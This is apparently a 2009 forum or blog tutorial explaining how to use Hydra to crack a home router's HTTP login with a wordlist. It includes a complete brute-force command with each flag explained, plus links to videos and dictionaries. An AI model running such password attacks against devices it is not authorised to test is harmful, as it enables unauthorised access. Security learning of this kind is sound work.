Links
Watch video on-line: http://www.mediafire.com/download.php?fmdzgytk0fj
Download video: http://blip.tv/file/2318952
Commands: http://pastebin.com/f5f5a18f2


What is this?
A basic guide on how to use hydra to crack a http password on a 'home' router.


How does this work?
> Uses a dictionary attack to test for weak or simple passwords on one or more remote clients


What do I need?
> Hydra
> Big dictionary


Software
Name: Hydra
Version: 5.4
Home Page: http://freeworld.thc.org/
Download Link: http://freeworld.thc.org/download.ph...5.4-src.tar.gz


Commands:
Code:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = username
-P = password (Looks for a wordlist)
-e ns = checks for 'null' password
-t xx= How many tasks to run at once
-f = exit once it finds the first user/password
-s = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.1 = IP address
http-get = what to crack/method etc
/ = Page to crack - root



Notes:

This is cut from my final video called "g0tmi1k's home network".
The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Video length: 01:21
Capture length: 01:40
Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)

Blog Post:http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-http-hydra.html
Forum Post: http://forums.remote-exploit.org/specialist-topics/24208-video-how-crack-http-hydra.html
Dictionaries: http://forums.remote-exploit.org/pen...-wordlist.html



~g0tmi1k